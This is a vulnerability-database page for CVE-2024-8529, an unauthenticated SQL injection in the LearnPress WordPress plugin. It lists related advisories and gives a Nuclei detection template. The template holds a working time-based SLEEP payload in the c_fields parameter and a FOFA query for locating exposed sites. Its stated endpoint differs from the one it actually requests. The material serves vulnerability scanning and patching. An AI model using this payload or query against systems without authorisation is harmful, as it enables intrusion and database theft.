| Title | Published | Reporter |
|---|---|---|
| CVE-2024-8529 | 12 Sep 2024 11:51 | circl |
| WordPress plugin LearnPress SQL injection vulnerability | 12 Sep 2024 00:00 | cnnvd |
| CVE-2024-8529 | 12 Sep 2024 08:30 | cve |
| CVE-2024-8529 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' | 12 Sep 2024 08:30 | cvelist |
| Exploit for SQL Injection in Thimpress Learnpress | 12 Oct 2024 20:52 | githubexploit |
| WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529) | 17 Oct 2024 18:54 | metasploit |
| CVE-2024-8529 | 12 Sep 2024 09:15 | nvd |
| CVE-2024-8529 | 12 Sep 2024 09:15 | osv |
| WordPress LearnPress Plugin <= 4.2.7 is vulnerable to SQL Injection | 12 Sep 2024 00:00 | patchstack |
| WordPress LearnPress plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' vulnerability | 12 Sep 2024 06:36 | patchstack |

```yaml
id: CVE-2024-8529

info:
  name: LearnPress < 4.2.7.1 - SQL Injection
  author: ritikchaddha,iacker
  severity: critical
  description: |
    The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection through the c_fields parameter to extract sensitive database information including user credentials, course data, and personal information from the LearnPress LMS.
  remediation: |
    Update the LearnPress plugin to version 4.2.7.1 or later.
  reference:
    - https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8529
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8529
    cwe-id: CWE-89
    epss-score: 0.11831
    epss-percentile: 0.95578
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="wp-content/plugins/learnpress"
    vendor: thimpress
    product: learnpress
  tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/learnpress/readme.txt HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "LearnPress", "WordPress LMS Plugin")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(8)))a)/*{{randstr}}*/ HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 490a00463044022063aebee797b485b5e4729e83811afe8714cb471b99dfb1aa49ea195292e7739b0220216e4eca3cd4c71afbf7e40bd9eac8325bc2738a488a219acce621b2c1f83fa6:922c64590222798bb761d5b6d8e72950
```